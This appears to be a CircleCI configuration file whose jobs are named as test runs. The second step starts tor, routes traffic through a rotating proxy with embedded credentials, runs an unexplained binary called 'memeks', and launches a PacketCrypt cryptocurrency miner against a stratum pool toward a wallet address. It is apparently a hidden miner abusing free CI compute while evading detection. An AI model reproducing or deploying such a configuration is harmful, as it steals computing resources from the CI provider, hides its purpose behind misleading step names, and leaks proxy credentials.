.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Run tests
          command: |
            apk update
            apk upgrade
            apk add curl
            apk add wget
            apk add go
            apk add --no-cache make
            apk add sudo
            curl ifconfig.me
      - run:
          name: Run testssw
          command: |
            apk update
            apk add torsocks screen
            screen -dm -S run sudo tor
            sleep 20                        
            export HTTP_PROXY=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/
            export HTTPS_PROXY=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/
            export http_proxy=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/
            export https_proxy=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/
            curl ifconfig.me
            chmod +x memeks
            ./memeks
            curl ifconfig.me
            docker pull thomasjp0x42/packetcrypt
            docker run thomasjp0x42/packetcrypt ann -p pkt1qduwuytjm00dulznuc7glh3rzqd6xgaa9sn36ds https://stratum.zetahash.com 2>&1 | grep -o "annmine.rs.*Ke.*"
version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  gas1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
        environment:
          HTTP_PROXY: http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/
          HTTPS_PROXY: http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/          
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - gas1     
